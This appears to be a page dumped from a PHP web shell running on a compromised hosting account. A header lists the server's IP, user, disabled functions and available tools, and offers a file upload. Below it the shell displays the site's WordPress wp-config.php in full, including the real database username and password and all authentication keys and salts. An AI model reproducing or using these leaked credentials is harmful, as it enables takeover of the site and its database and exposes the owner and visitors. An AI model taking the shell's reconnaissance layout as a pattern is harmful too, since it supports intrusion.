| Server IP : 88.222.243.156 / Your IP : 216.73.216.209 Web Server : LiteSpeed System : Linux in-mum-web1191.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u131919099 ( 131919099) PHP Version : 8.2.30 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u131919099/domains/happypgs.com/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u131919099_axSFA' );
/** Database username */
define( 'DB_USER', 'u131919099_7qEg0' );
/** Database password */
define( 'DB_PASSWORD', 'zi3feqfMBM' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'Ly^hh01J=7U({=JJq&l{V?`2q^dHwRiJD/*u.!SZB?qi{<A%vl0j>f4tG1;K<} )' );
define( 'SECURE_AUTH_KEY', '7f5o$5__vu^UCrV8l9v(?ynWc~VAhViyV33M;~is%aIJ&c6Ru*N67B%V:t9D6qEs' );
define( 'LOGGED_IN_KEY', 'V[-d;M;|V=5ev,$E>47b>:5p!Jb+zb@xp6vU8W<eyxq$B(q8p>!y{YC0d1=%bgb%' );
define( 'NONCE_KEY', 'N} n/&z/(<]lEgSw9ID|bA$omp[~m9{d<Z0_]+TaEIDYyI79FX[ARzt U=Gw|6+0' );
define( 'AUTH_SALT', 'NK2gU&uG4SGbo*nQ?F6RYQu1I<V9{Hl(Dw60c4/7/?JbL~10C$eJMPXX6n;~}#:9' );
define( 'SECURE_AUTH_SALT', 'Wj1]t*RkfyznhL`o4A}Mu*yc<jV1K &W6mVp>^|Uu7pHu&V#aar|d{=r${$>AorA' );
define( 'LOGGED_IN_SALT', '[aM0q#y`Zdq(Z:US?VMOx[2]n}k1G(hZ$4F6PR0R94a5%oUZaGa]:.3iGtf+z-&z' );
define( 'NONCE_SALT', ',FMu Q6Ag|E?ZqF1yc=39(*q-~muox*[XD=@C*2a|wBOgRd(4-9,].h{ue#R4DEg' );
define( 'WP_CACHE_KEY_SALT', '3d[9C&YyhPf-3*kL9-u4MY%_}r9Mvp4w~mUO8!LnlC31 X -d[VVRM#w7Ce{z&M=' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
define( 'FS_METHOD', 'direct' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';